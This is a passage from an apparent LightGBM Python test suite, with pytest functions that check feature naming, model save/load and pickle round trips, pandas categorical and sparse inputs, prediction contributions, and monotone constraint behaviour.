    come back with the spaces replaced (matching the underscore variants)."""
    X_train, y_train = load_boston(return_X_y=True)
    params = {'verbose': -1}
    lgb_train = lgb.Dataset(X_train, y_train)
    n_features = X_train.shape[-1]
    underscore_names = [f'f_{i}' for i in range(n_features)]
    booster = lgb.train(params, lgb_train, num_boost_round=5, feature_name=underscore_names)
    assert underscore_names == booster.feature_name()
    # test feature_names with whitespaces
    space_names = [f'f {i}' for i in range(n_features)]
    booster = lgb.train(params, lgb_train, num_boost_round=5, feature_name=space_names)
    # names with spaces are stored as their underscore equivalents
    assert underscore_names == booster.feature_name()
def test_feature_name_with_non_ascii():
    """Non-ASCII feature names survive training and a model-file round trip."""
    train_features = np.random.normal(size=(100, 4))
    train_targets = np.random.random(100)
    # This has non-ascii strings.
    feature_names = [u'F_零', u'F_一', u'F_二', u'F_三']
    booster = lgb.train({'verbose': -1},
                        lgb.Dataset(train_features, train_targets),
                        num_boost_round=5, feature_name=feature_names)
    assert feature_names == booster.feature_name()
    booster.save_model('lgb.model')
    # names must be identical after reloading from disk
    reloaded = lgb.Booster(model_file='lgb.model')
    assert feature_names == reloaded.feature_name()
def test_save_load_copy_pickle():
    """A model used as init_model must behave identically whether passed as an
    object, a saved file, a (deep)copy, or a pickle round-trip."""
    def train_and_predict(init_model=None, return_model=False):
        # fixed pipeline; only the init_model source varies between calls
        X, y = load_boston(return_X_y=True)
        X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
        params = {
            'objective': 'regression',
            'metric': 'l2',
            'verbose': -1
        }
        lgb_train = lgb.Dataset(X_train, y_train)
        gbm_template = lgb.train(params, lgb_train, num_boost_round=10, init_model=init_model)
        return gbm_template if return_model else mean_squared_error(y_test, gbm_template.predict(X_test))
    gbm = train_and_predict(return_model=True)
    # baseline: continue training from the in-memory booster
    ret_origin = train_and_predict(init_model=gbm)
    other_ret = []
    gbm.save_model('lgb.model')
    with open('lgb.model') as f:  # check all params are logged into model file correctly
        assert f.read().find("[num_iterations: 10]") != -1
    other_ret.append(train_and_predict(init_model='lgb.model'))
    gbm_load = lgb.Booster(model_file='lgb.model')
    other_ret.append(train_and_predict(init_model=gbm_load))
    other_ret.append(train_and_predict(init_model=copy.copy(gbm)))
    other_ret.append(train_and_predict(init_model=copy.deepcopy(gbm)))
    with open('lgb.pkl', 'wb') as f:
        pickle.dump(gbm, f)
    with open('lgb.pkl', 'rb') as f:
        gbm_pickle = pickle.load(f)
    other_ret.append(train_and_predict(init_model=gbm_pickle))
    gbm_pickles = pickle.loads(pickle.dumps(gbm))
    other_ret.append(train_and_predict(init_model=gbm_pickles))
    # every init_model flavour must continue training to the same result
    for ret in other_ret:
        assert ret_origin == pytest.approx(ret)
def test_pandas_categorical():
    """pandas categorical columns: 'auto' detection, explicit categorical_feature
    by index and by name, model-file and string round trips, and the stored
    pandas_categorical category lists."""
    pd = pytest.importorskip("pandas")
    np.random.seed(42)  # sometimes there is no difference how cols are treated (cat or not cat)
    X = pd.DataFrame({"A": np.random.permutation(['a', 'b', 'c', 'd'] * 75),  # str
                      "B": np.random.permutation([1, 2, 3] * 100),  # int
                      "C": np.random.permutation([0.1, 0.2, -0.1, -0.1, 0.2] * 60),  # float
                      "D": np.random.permutation([True, False] * 150),  # bool
                      "E": pd.Categorical(np.random.permutation(['z', 'y', 'x', 'w', 'v'] * 60),
                                          ordered=True)})  # str and ordered categorical
    y = np.random.permutation([0, 1] * 150)
    X_test = pd.DataFrame({"A": np.random.permutation(['a', 'b', 'e'] * 20),  # unseen category
                           "B": np.random.permutation([1, 3] * 30),
                           "C": np.random.permutation([0.1, -0.1, 0.2, 0.2] * 15),
                           "D": np.random.permutation([True, False] * 30),
                           "E": pd.Categorical(np.random.permutation(['z', 'y'] * 30),
                                               ordered=True)})
    np.random.seed()  # reset seed
    cat_cols_actual = ["A", "B", "C", "D"]
    cat_cols_to_store = cat_cols_actual + ["E"]
    X[cat_cols_actual] = X[cat_cols_actual].astype('category')
    X_test[cat_cols_actual] = X_test[cat_cols_actual].astype('category')
    cat_values = [X[col].cat.categories.tolist() for col in cat_cols_to_store]
    params = {
        'objective': 'binary',
        'metric': 'binary_logloss',
        'verbose': -1
    }
    lgb_train = lgb.Dataset(X, y)
    # gbm0: rely on automatic categorical detection
    gbm0 = lgb.train(params, lgb_train, num_boost_round=10)
    pred0 = gbm0.predict(X_test)
    assert lgb_train.categorical_feature == 'auto'
    lgb_train = lgb.Dataset(X, pd.DataFrame(y))  # also test that label can be one-column pd.DataFrame
    # gbm1: only column index 0 declared categorical
    gbm1 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=[0])
    pred1 = gbm1.predict(X_test)
    assert lgb_train.categorical_feature == [0]
    lgb_train = lgb.Dataset(X, pd.Series(y))  # also test that label can be pd.Series
    # gbm2: same single column declared by name — must match gbm1
    gbm2 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=['A'])
    pred2 = gbm2.predict(X_test)
    assert lgb_train.categorical_feature == ['A']
    lgb_train = lgb.Dataset(X, y)
    # gbm3: the four actual category dtype columns — must match auto detection
    gbm3 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=['A', 'B', 'C', 'D'])
    pred3 = gbm3.predict(X_test)
    assert lgb_train.categorical_feature == ['A', 'B', 'C', 'D']
    # model-file and model-string round trips must preserve predictions
    gbm3.save_model('categorical.model')
    gbm4 = lgb.Booster(model_file='categorical.model')
    pred4 = gbm4.predict(X_test)
    model_str = gbm4.model_to_string()
    gbm4.model_from_string(model_str, False)
    pred5 = gbm4.predict(X_test)
    gbm5 = lgb.Booster(model_str=model_str)
    pred6 = gbm5.predict(X_test)
    lgb_train = lgb.Dataset(X, y)
    # gbm6: additionally treat the ordered categorical 'E' as categorical
    gbm6 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=['A', 'B', 'C', 'D', 'E'])
    pred7 = gbm6.predict(X_test)
    assert lgb_train.categorical_feature == ['A', 'B', 'C', 'D', 'E']
    lgb_train = lgb.Dataset(X, y)
    # gbm7: explicitly no categorical features at all
    gbm7 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=[])
    pred8 = gbm7.predict(X_test)
    assert lgb_train.categorical_feature == []
    with pytest.raises(AssertionError):
        np.testing.assert_allclose(pred0, pred1)
    with pytest.raises(AssertionError):
        np.testing.assert_allclose(pred0, pred2)
    np.testing.assert_allclose(pred1, pred2)
    np.testing.assert_allclose(pred0, pred3)
    np.testing.assert_allclose(pred0, pred4)
    np.testing.assert_allclose(pred0, pred5)
    np.testing.assert_allclose(pred0, pred6)
    with pytest.raises(AssertionError):
        np.testing.assert_allclose(pred0, pred7)  # ordered cat features aren't treated as cat features by default
    with pytest.raises(AssertionError):
        np.testing.assert_allclose(pred0, pred8)
    # every booster must have recorded the same stored category lists
    assert gbm0.pandas_categorical == cat_values
    assert gbm1.pandas_categorical == cat_values
    assert gbm2.pandas_categorical == cat_values
    assert gbm3.pandas_categorical == cat_values
    assert gbm4.pandas_categorical == cat_values
    assert gbm5.pandas_categorical == cat_values
    assert gbm6.pandas_categorical == cat_values
    assert gbm7.pandas_categorical == cat_values
def test_pandas_sparse():
    """pandas SparseArray input must predict identically to its dense equivalent."""
    pd = pytest.importorskip("pandas")
    try:
        from pandas.arrays import SparseArray
    except ImportError:  # support old versions
        from pandas import SparseArray
    X = pd.DataFrame({"A": SparseArray(np.random.permutation([0, 1, 2] * 100)),
                      "B": SparseArray(np.random.permutation([0.0, 0.1, 0.2, -0.1, 0.2] * 60)),
                      "C": SparseArray(np.random.permutation([True, False] * 150))})
    y = pd.Series(SparseArray(np.random.permutation([0, 1] * 150)))
    X_test = pd.DataFrame({"A": SparseArray(np.random.permutation([0, 2] * 30)),
                           "B": SparseArray(np.random.permutation([0.0, 0.1, 0.2, -0.1] * 15)),
                           "C": SparseArray(np.random.permutation([True, False] * 30))})
    # sanity check that the frames really carry sparse dtypes
    # NOTE(review): presumably is_sparse is unavailable before pandas 0.24 — confirm
    if pd.__version__ >= '0.24.0':
        for dtype in pd.concat([X.dtypes, X_test.dtypes, pd.Series(y.dtypes)]):
            assert pd.api.types.is_sparse(dtype)
    params = {
        'objective': 'binary',
        'verbose': -1
    }
    lgb_train = lgb.Dataset(X, y)
    gbm = lgb.train(params, lgb_train, num_boost_round=10)
    pred_sparse = gbm.predict(X_test, raw_score=True)
    # densify via the API available in this pandas version
    if hasattr(X_test, 'sparse'):
        pred_dense = gbm.predict(X_test.sparse.to_dense(), raw_score=True)
    else:
        pred_dense = gbm.predict(X_test.to_dense(), raw_score=True)
    np.testing.assert_allclose(pred_sparse, pred_dense)
def test_reference_chain():
    """Chained Dataset.subset calls must remain usable for training and
    validation, producing a full eval history for both sets."""
    features = np.random.normal(size=(100, 2))
    targets = np.random.normal(size=100)
    base_dataset = lgb.Dataset(features, targets)
    # take subsets and train
    train_subset = base_dataset.subset(np.arange(80))
    # a subset of a subset still chains back to the root Dataset
    valid_subset = base_dataset.subset(np.arange(80, 100)).subset(np.arange(18))
    evals_result = {}
    lgb.train({'objective': 'regression_l2', 'metric': 'rmse'},
              train_subset, num_boost_round=20,
              valid_sets=[train_subset, valid_subset],
              verbose_eval=False, evals_result=evals_result)
    assert len(evals_result['training']['rmse']) == 20
    assert len(evals_result['valid_1']['rmse']) == 20
def test_contribs():
    """Per-feature contributions (pred_contrib, incl. the expected-value column)
    must sum to the raw score for every row."""
    X, y = load_breast_cancer(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'objective': 'binary',
        'metric': 'binary_logloss',
        'verbose': -1,
    }
    booster = lgb.train(params, lgb.Dataset(X_train, y_train), num_boost_round=20)
    raw_scores = booster.predict(X_test, raw_score=True)
    contrib_sums = np.sum(booster.predict(X_test, pred_contrib=True), axis=1)
    assert np.linalg.norm(raw_scores - contrib_sums) < 1e-4
def test_contribs_sparse():
    """pred_contrib on CSR/CSC input returns sparse output of the matching
    format, numerically equal to the dense computation."""
    n_features = 20
    n_samples = 100
    # generate CSR sparse dataset
    X, y = make_multilabel_classification(n_samples=n_samples,
                                          sparse=True,
                                          n_features=n_features,
                                          n_classes=1,
                                          n_labels=2)
    y = y.flatten()
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'objective': 'binary',
        'verbose': -1,
    }
    lgb_train = lgb.Dataset(X_train, y_train)
    gbm = lgb.train(params, lgb_train, num_boost_round=20)
    contribs_csr = gbm.predict(X_test, pred_contrib=True)
    # CSR input must yield CSR output
    assert isspmatrix_csr(contribs_csr)
    # convert data to dense and get back same contribs
    contribs_dense = gbm.predict(X_test.toarray(), pred_contrib=True)
    # validate the values are the same (looser tolerance on aarch64)
    if platform.machine() == 'aarch64':
        np.testing.assert_allclose(contribs_csr.toarray(), contribs_dense, rtol=1, atol=1e-12)
    else:
        np.testing.assert_allclose(contribs_csr.toarray(), contribs_dense)
    # contributions (plus expected-value column) must sum to the raw score
    assert (np.linalg.norm(gbm.predict(X_test, raw_score=True)
                           - np.sum(contribs_dense, axis=1)) < 1e-4)
    # validate using CSC matrix
    X_test_csc = X_test.tocsc()
    contribs_csc = gbm.predict(X_test_csc, pred_contrib=True)
    # CSC input must yield CSC output
    assert isspmatrix_csc(contribs_csc)
    # validate the values are the same (looser tolerance on aarch64)
    if platform.machine() == 'aarch64':
        np.testing.assert_allclose(contribs_csc.toarray(), contribs_dense, rtol=1, atol=1e-12)
    else:
        np.testing.assert_allclose(contribs_csc.toarray(), contribs_dense)
def test_contribs_sparse_multiclass():
    """Multiclass pred_contrib on sparse input returns one sparse matrix per
    class, together matching the flattened dense output."""
    n_features = 20
    n_samples = 100
    n_labels = 4
    # generate CSR sparse dataset
    X, y = make_multilabel_classification(n_samples=n_samples,
                                          sparse=True,
                                          n_features=n_features,
                                          n_classes=1,
                                          n_labels=n_labels)
    y = y.flatten()
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'objective': 'multiclass',
        'num_class': n_labels,
        'verbose': -1,
    }
    lgb_train = lgb.Dataset(X_train, y_train)
    gbm = lgb.train(params, lgb_train, num_boost_round=20)
    contribs_csr = gbm.predict(X_test, pred_contrib=True)
    # multiclass sparse contribs come back as a list: one CSR matrix per class
    assert isinstance(contribs_csr, list)
    for perclass_contribs_csr in contribs_csr:
        assert isspmatrix_csr(perclass_contribs_csr)
    # convert data to dense and get back same contribs
    contribs_dense = gbm.predict(X_test.toarray(), pred_contrib=True)
    # validate the values are the same: stack per-class matrices into
    # (row, class, feature+1), then flatten to the dense layout
    contribs_csr_array = np.swapaxes(np.array([sparse_array.toarray() for sparse_array in contribs_csr]), 0, 1)
    contribs_csr_arr_re = contribs_csr_array.reshape((contribs_csr_array.shape[0],
                                                      contribs_csr_array.shape[1] * contribs_csr_array.shape[2]))
    # looser tolerance on aarch64
    if platform.machine() == 'aarch64':
        np.testing.assert_allclose(contribs_csr_arr_re, contribs_dense, rtol=1, atol=1e-12)
    else:
        np.testing.assert_allclose(contribs_csr_arr_re, contribs_dense)
    # per-class contributions must sum to the per-class raw scores
    contribs_dense_re = contribs_dense.reshape(contribs_csr_array.shape)
    assert np.linalg.norm(gbm.predict(X_test, raw_score=True) - np.sum(contribs_dense_re, axis=2)) < 1e-4
    # validate using CSC matrix
    X_test_csc = X_test.tocsc()
    contribs_csc = gbm.predict(X_test_csc, pred_contrib=True)
    assert isinstance(contribs_csc, list)
    for perclass_contribs_csc in contribs_csc:
        assert isspmatrix_csc(perclass_contribs_csc)
    # validate the values are the same
    contribs_csc_array = np.swapaxes(np.array([sparse_array.toarray() for sparse_array in contribs_csc]), 0, 1)
    contribs_csc_array = contribs_csc_array.reshape((contribs_csc_array.shape[0],
                                                     contribs_csc_array.shape[1] * contribs_csc_array.shape[2]))
    # looser tolerance on aarch64
    if platform.machine() == 'aarch64':
        np.testing.assert_allclose(contribs_csc_array, contribs_dense, rtol=1, atol=1e-12)
    else:
        np.testing.assert_allclose(contribs_csc_array, contribs_dense)
@pytest.mark.skipif(psutil.virtual_memory().available / 1024 / 1024 / 1024 < 3, reason='not enough RAM')
def test_int32_max_sparse_contribs():
    """pred_contrib on a very large sparse matrix (3M x 1000, whose contrib
    output exceeds int32 element indexing) must return correctly shaped output."""
    params = {
        'objective': 'binary'
    }
    train_features = np.random.rand(100, 1000)
    train_targets = [0] * 50 + [1] * 50
    lgb_train = lgb.Dataset(train_features, train_targets)
    gbm = lgb.train(params, lgb_train, num_boost_round=2)
    csr_input_shape = (3000000, 1000)
    test_features = csr_matrix(csr_input_shape)
    # sprinkle a few non-zeros so the matrix isn't entirely empty
    for i in range(0, csr_input_shape[0], csr_input_shape[0] // 6):
        for j in range(0, 1000, 100):
            test_features[i, j] = random.random()
    y_pred_csr = gbm.predict(test_features, pred_contrib=True)
    # Note there is an extra column added to the output for the expected value
    csr_output_shape = (csr_input_shape[0], csr_input_shape[1] + 1)
    assert y_pred_csr.shape == csr_output_shape
    y_pred_csc = gbm.predict(test_features.tocsc(), pred_contrib=True)
    # Note output CSC shape should be same as CSR output shape
    assert y_pred_csc.shape == csr_output_shape
def test_sliced_data():
    """Training on sliced views (numpy label slice, 2D sub-matrix, sliced CSR)
    must yield the same predictions as training on the contiguous originals."""
    def _fit_predict(features, labels):
        # train a small binary model and return in-sample predictions
        booster = lgb.train(
            params={
                'application': 'binary',
                'verbose': -1,
                'min_data': 5,
            },
            train_set=lgb.Dataset(features, label=labels),
            num_boost_round=10,
        )
        return booster.predict(features)

    num_samples = 100
    features = np.random.rand(num_samples, 5)
    positive_samples = int(num_samples * 0.25)
    labels = np.append(np.ones(positive_samples, dtype=np.float32),
                       np.zeros(num_samples - positive_samples, dtype=np.float32))
    origin_pred = _fit_predict(features, labels)
    # labels obtained as a column slice of a stacked matrix
    stacked_labels = np.column_stack((labels, np.ones(num_samples, dtype=np.float32)))
    sliced_labels = stacked_labels[:, 0]
    np.testing.assert_allclose(origin_pred, _fit_predict(features, sliced_labels))
    # pad two constant columns on each side (9 columns total) ...
    ones_col = np.ones(num_samples, dtype=np.float32)
    stacked_features = np.column_stack((ones_col, ones_col, features, ones_col, ones_col))
    # ... and two constant rows at the top and bottom
    ones_row = np.ones(9, dtype=np.float32).reshape((1, 9))
    stacked_features = np.concatenate((ones_row, ones_row, stacked_features, ones_row, ones_row), axis=0)
    # slicing the padded matrix recovers the original features exactly
    sliced_features = stacked_features[2:102, 2:7]
    assert np.all(sliced_features == features)
    np.testing.assert_allclose(origin_pred, _fit_predict(sliced_features, sliced_labels))
    # same check through a sliced CSR matrix
    sliced_csr = csr_matrix(stacked_features)[2:102, 2:7]
    assert np.all(sliced_csr == features)
    np.testing.assert_allclose(origin_pred, _fit_predict(sliced_csr, sliced_labels))
def test_init_with_subset():
    """Continued training (init_model) must work with Dataset subsets.

    For an in-memory Dataset, subsets keep their own row counts and training
    with ``init_model`` succeeds.  For a Dataset loaded from a saved binary
    file, ``get_data()`` returns the file path, and continued training from a
    file-backed subset is expected to fail with "Unknown format of training
    data".

    Fix over the original: the test wrote ``lgb_train_data.bin`` to the
    working directory and never removed it; the file is now deleted in a
    ``finally`` block so the test leaves no artifact behind.
    """
    import os

    data = np.random.random((50, 2))
    y = [1] * 25 + [0] * 25
    lgb_train = lgb.Dataset(data, y, free_raw_data=False)
    subset_index_1 = np.random.choice(np.arange(50), 30, replace=False)
    subset_data_1 = lgb_train.subset(subset_index_1)
    subset_index_2 = np.random.choice(np.arange(50), 20, replace=False)
    subset_data_2 = lgb_train.subset(subset_index_2)
    params = {
        'objective': 'binary',
        'verbose': -1
    }
    init_gbm = lgb.train(params=params,
                         train_set=subset_data_1,
                         num_boost_round=10,
                         keep_training_booster=True)
    lgb.train(params=params,
              train_set=subset_data_2,
              num_boost_round=10,
              init_model=init_gbm)
    assert lgb_train.get_data().shape[0] == 50
    assert subset_data_1.get_data().shape[0] == 30
    assert subset_data_2.get_data().shape[0] == 20
    lgb_train.save_binary("lgb_train_data.bin")
    try:
        lgb_train_from_file = lgb.Dataset('lgb_train_data.bin', free_raw_data=False)
        subset_data_3 = lgb_train_from_file.subset(subset_index_1)
        subset_data_4 = lgb_train_from_file.subset(subset_index_2)
        init_gbm_2 = lgb.train(params=params,
                               train_set=subset_data_3,
                               num_boost_round=10,
                               keep_training_booster=True)
        # continued training from a file-backed subset is not supported
        with np.testing.assert_raises_regex(lgb.basic.LightGBMError, "Unknown format of training data"):
            lgb.train(params=params,
                      train_set=subset_data_4,
                      num_boost_round=10,
                      init_model=init_gbm_2)
        # file-backed Datasets report the file path as their data
        assert lgb_train_from_file.get_data() == "lgb_train_data.bin"
        assert subset_data_3.get_data() == "lgb_train_data.bin"
        assert subset_data_4.get_data() == "lgb_train_data.bin"
    finally:
        # don't leave the binary artifact behind for subsequent tests
        os.remove("lgb_train_data.bin")
def generate_trainset_for_monotone_constraints_tests(x3_to_category=True):
    """Build a synthetic regression Dataset for the monotone-constraints tests.

    Feature 0 is positively correlated with the target, features 1 and 2 are
    negatively correlated; feature 2 is optionally binned into categories
    (and registered as a categorical feature) when ``x3_to_category`` is True.
    """
    n_points = 3000
    x1 = np.random.random(size=n_points)
    x2 = np.random.random(size=n_points)
    x3 = np.random.random(size=n_points)
    third_column = categorize(x3) if x3_to_category else x3
    x = np.column_stack((x1, x2, third_column))
    noise = np.random.normal(loc=0.0, scale=0.01, size=n_points)
    scales = 10. * (np.random.random(6) + 0.5)
    # target mixes linear and sinusoidal terms with the intended monotone signs
    y = (scales[0] * x1
         + np.sin(scales[1] * np.pi * x1)
         - scales[2] * x2
         - np.cos(scales[3] * np.pi * x2)
         - scales[4] * x3
         - np.cos(scales[5] * np.pi * x3)
         + noise)
    categorical_features = [2] if x3_to_category else []
    return lgb.Dataset(x, label=y, categorical_feature=categorical_features, free_raw_data=False)
@pytest.mark.parametrize("test_with_categorical_variable", [True, False])
def test_monotone_constraints(test_with_categorical_variable):
    """Check that monotone constraints (and, when enabled, interaction
    constraints) are respected by every constraint-enforcement method."""
    def is_increasing(y):
        return (np.diff(y) >= 0.0).all()

    def is_decreasing(y):
        return (np.diff(y) <= 0.0).all()

    def is_non_monotone(y):
        return (np.diff(y) < 0.0).any() and (np.diff(y) > 0.0).any()

    def is_correctly_constrained(learner, x3_to_category=True):
        # sweep each feature over [0, 1] while holding the others fixed and
        # check the resulting prediction curve for the expected monotonicity
        iterations = 10
        n = 1000
        variable_x = np.linspace(0, 1, n).reshape((n, 1))
        fixed_xs_values = np.linspace(0, 1, n)
        for i in range(iterations):
            fixed_x = fixed_xs_values[i] * np.ones((n, 1))
            monotonically_increasing_x = np.column_stack((variable_x, fixed_x, fixed_x))
            monotonically_increasing_y = learner.predict(monotonically_increasing_x)
            monotonically_decreasing_x = np.column_stack((fixed_x, variable_x, fixed_x))
            monotonically_decreasing_y = learner.predict(monotonically_decreasing_x)
            non_monotone_x = np.column_stack(
                (
                    fixed_x,
                    fixed_x,
                    categorize(variable_x) if x3_to_category else variable_x,
                )
            )
            non_monotone_y = learner.predict(non_monotone_x)
            if not (
                is_increasing(monotonically_increasing_y)
                and is_decreasing(monotonically_decreasing_y)
                and is_non_monotone(non_monotone_y)
            ):
                return False
        return True

    def are_interactions_enforced(gbm, feature_sets):
        def parse_tree_features(gbm):
            # trees start at position 1.
            tree_str = gbm.model_to_string().split("Tree")[1:]
            feature_sets = []
            for tree in tree_str:
                # split_features are in 4th line.
                features = tree.splitlines()[3].split("=")[1].split(" ")
                features = set(f"Column_{f}" for f in features)
                feature_sets.append(features)
            return np.array(feature_sets)

        def has_interaction(treef):
            # a tree "interacts" if its splits draw from more than one allowed set
            n = 0
            for fs in feature_sets:
                if len(treef.intersection(fs)) > 0:
                    n += 1
            return n > 1

        tree_features = parse_tree_features(gbm)
        has_interaction_flag = np.array(
            [has_interaction(treef) for treef in tree_features]
        )
        return not has_interaction_flag.any()

    trainset = generate_trainset_for_monotone_constraints_tests(
        test_with_categorical_variable
    )
    for test_with_interaction_constraints in [True, False]:
        error_msg = ("Model not correctly constrained "
                     f"(test_with_interaction_constraints={test_with_interaction_constraints})")
        for monotone_constraints_method in ["basic", "intermediate", "advanced"]:
            params = {
                "min_data": 20,
                "num_leaves": 20,
                "monotone_constraints": [1, -1, 0],
                "monotone_constraints_method": monotone_constraints_method,
                "use_missing": False,
            }
            if test_with_interaction_constraints:
                params["interaction_constraints"] = [[0], [1], [2]]
            constrained_model = lgb.train(params, trainset)
            assert is_correctly_constrained(
                constrained_model, test_with_categorical_variable
            ), error_msg
            if test_with_interaction_constraints:
                # Fix: the third entry was the bare string "Column_2"; a
                # set.intersection over a string iterates its characters and
                # can never match a "Column_N" feature name, so interactions
                # involving the third feature were silently never detected.
                feature_sets = [["Column_0"], ["Column_1"], ["Column_2"]]
                assert are_interactions_enforced(constrained_model, feature_sets)
def test_monotone_penalty():
    """Check that `monotone_penalty` delays splits on constrained features:
    the first int(penalty) levels of every tree must split only on
    unconstrained features, while constrained features must still appear
    somewhere deeper in each tree."""
    def are_first_splits_non_monotone(tree, n, monotone_constraints):
        # True iff no split within the top `n` levels uses a constrained feature.
        if n <= 0:  # past the penalized depth — nothing left to check
            return True
        if "leaf_value" in tree:  # hit a leaf before exhausting `n` levels
            return True
        if monotone_constraints[tree["split_feature"]] != 0:
            return False
        return (are_first_splits_non_monotone(tree["left_child"], n - 1, monotone_constraints)
                and are_first_splits_non_monotone(tree["right_child"], n - 1, monotone_constraints))
    def are_there_monotone_splits(tree, monotone_constraints):
        # True iff any split anywhere in the tree uses a constrained feature.
        if "leaf_value" in tree:
            return False
        if monotone_constraints[tree["split_feature"]] != 0:
            return True
        return (are_there_monotone_splits(tree["left_child"], monotone_constraints)
                or are_there_monotone_splits(tree["right_child"], monotone_constraints))
    max_depth = 5
    monotone_constraints = [1, -1, 0]
    # penalty of 2.0 -> the top 2 levels must avoid constrained features
    penalization_parameter = 2.0
    trainset = generate_trainset_for_monotone_constraints_tests(x3_to_category=False)
    for monotone_constraints_method in ["basic", "intermediate", "advanced"]:
        params = {
            'max_depth': max_depth,
            'monotone_constraints': monotone_constraints,
            'monotone_penalty': penalization_parameter,
            "monotone_constraints_method": monotone_constraints_method,
        }
        constrained_model = lgb.train(params, trainset, 10)
        dumped_model = constrained_model.dump_model()["tree_info"]
        for tree in dumped_model:
            assert are_first_splits_non_monotone(tree["tree_structure"], int(penalization_parameter),
                                                 monotone_constraints)
            assert are_there_monotone_splits(tree["tree_structure"], monotone_constraints)
# test if a penalty as high as the depth indeed prohibits all monotone splits
def test_monotone_penalty_max():
    """A monotone penalty equal to max_depth must prevent any split on the
    constrained features, so the constrained model's predictions coincide
    with a model trained on the unconstrained third feature alone."""
    max_depth = 5
    monotone_constraints = [1, -1, 0]
    penalization_parameter = max_depth
    trainset_constrained_model = generate_trainset_for_monotone_constraints_tests(x3_to_category=False)
    x = trainset_constrained_model.data
    y = trainset_constrained_model.label
    # the third (unconstrained) feature, as a single-column matrix
    x3_only = x[:, 2].reshape(-1, 1)
    trainset_unconstrained_model = lgb.Dataset(x3_only, label=y)
    params_constrained_model = {
        'monotone_constraints': monotone_constraints,
        'monotone_penalty': penalization_parameter,
        "max_depth": max_depth,
        "gpu_use_dp": True,
    }
    params_unconstrained_model = {
        "max_depth": max_depth,
        "gpu_use_dp": True,
    }
    unconstrained_model = lgb.train(params_unconstrained_model, trainset_unconstrained_model, 10)
    unconstrained_model_predictions = unconstrained_model.predict(x3_only)
    for monotone_constraints_method in ["basic", "intermediate", "advanced"]:
        params_constrained_model["monotone_constraints_method"] = monotone_constraints_method
        # the penalty is so high that the first 2 features should not be used;
        # a maximal penalty must then be equivalent to dropping those features
        constrained_model = lgb.train(params_constrained_model, trainset_constrained_model, 10)
        np.testing.assert_array_equal(constrained_model.predict(x), unconstrained_model_predictions)
def test_max_bin_by_feature():
    """`max_bin_by_feature` must cap the number of distinct splits per feature."""
    col1 = np.arange(0, 100)[:, np.newaxis]
    col2 = np.zeros((100, 1))
    col2[20:] = 1
    X = np.concatenate([col1, col2], axis=1)
    y = np.arange(0, 100)
    params = {
        'objective': 'regression_l2',
        'verbose': -1,
        'num_leaves': 100,
        'min_data_in_leaf': 1,
        'min_sum_hessian_in_leaf': 0,
        'min_data_in_bin': 1,
        'max_bin_by_feature': [100, 2]
    }
    # 100 bins on the informative first column: every sample gets its own leaf
    est = lgb.train(params, lgb.Dataset(X, label=y), num_boost_round=1)
    assert len(np.unique(est.predict(X))) == 100
    # only 2 bins on the first column: at most 3 distinct predictions remain
    params['max_bin_by_feature'] = [2, 100]
    est = lgb.train(params, lgb.Dataset(X, label=y), num_boost_round=1)
    assert len(np.unique(est.predict(X))) == 3
def test_small_max_bin():
    """Training must work with very small `max_bin` values, both with and
    without NaN values in the features."""
    np.random.seed(0)
    y = np.random.choice([0, 1], 100)
    x = np.ones((100, 1))
    x[:30, 0] = -1
    x[60:, 0] = 2
    params = {
        'objective': 'binary',
        'seed': 0,
        'min_data_in_leaf': 1,
        'verbose': -1,
        'max_bin': 2,
    }
    lgb.train(params, lgb.Dataset(x, label=y), num_boost_round=5)
    # a NaN needs a bin of its own, so allow one more bin
    x[0, 0] = np.nan
    params['max_bin'] = 3
    lgb.train(params, lgb.Dataset(x, label=y), num_boost_round=5)
    np.random.seed()  # reset seed
def test_refit():
    """Refitting a trained booster on the held-out data must reduce its
    log-loss on that data."""
    X, y = load_breast_cancer(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'objective': 'binary',
        'metric': 'binary_logloss',
        'verbose': -1,
        'min_data': 10
    }
    gbm = lgb.train(params, lgb.Dataset(X_train, y_train), num_boost_round=20)
    err_before = log_loss(y_test, gbm.predict(X_test))
    refitted_gbm = gbm.refit(X_test, y_test)
    err_after = log_loss(y_test, refitted_gbm.predict(X_test))
    assert err_before > err_after
def test_mape_rf():
    """MAPE objective with random-forest boosting and boost_from_average=True
    must produce sensible (non-collapsed) predictions."""
    X, y = load_boston(return_X_y=True)
    params = {
        'boosting_type': 'rf',
        'objective': 'mape',
        'verbose': -1,
        'bagging_freq': 1,
        'bagging_fraction': 0.8,
        'feature_fraction': 0.8,
        'boost_from_average': True
    }
    gbm = lgb.train(params, lgb.Dataset(X, y), num_boost_round=20)
    mean_prediction = gbm.predict(X).mean()
    assert mean_prediction > 20
def test_mape_dart():
    """MAPE objective with DART boosting and boost_from_average=False
    must produce sensible (non-collapsed) predictions."""
    X, y = load_boston(return_X_y=True)
    params = {
        'boosting_type': 'dart',
        'objective': 'mape',
        'verbose': -1,
        'bagging_freq': 1,
        'bagging_fraction': 0.8,
        'feature_fraction': 0.8,
        'boost_from_average': False
    }
    gbm = lgb.train(params, lgb.Dataset(X, y), num_boost_round=40)
    mean_prediction = gbm.predict(X).mean()
    assert mean_prediction > 18
def check_constant_features(y_true, expected_pred, more_params):
    """Train on a single constant feature and assert every prediction equals
    `expected_pred` (i.e. only the objective's prior/average can be learned).

    `more_params` overrides the base regression parameters (e.g. objective
    and num_class)."""
    X_train = np.ones((len(y_true), 1))
    y_train = np.array(y_true)
    params = {
        'objective': 'regression',
        'num_class': 1,
        'verbose': -1,
        'min_data': 1,
        'num_leaves': 2,
        'learning_rate': 1,
        'min_data_in_bin': 1,
        'boost_from_average': True
    }
    params.update(more_params)
    booster = lgb.train(params, lgb.Dataset(X_train, y_train, params=params), num_boost_round=2)
    assert np.allclose(booster.predict(X_train), expected_pred)
def test_constant_features_regression():
    """With a constant feature, regression must predict the label mean."""
    params = {'objective': 'regression'}
    for y_true, expected in (
        ([0.0, 10.0, 0.0, 10.0], 5.0),
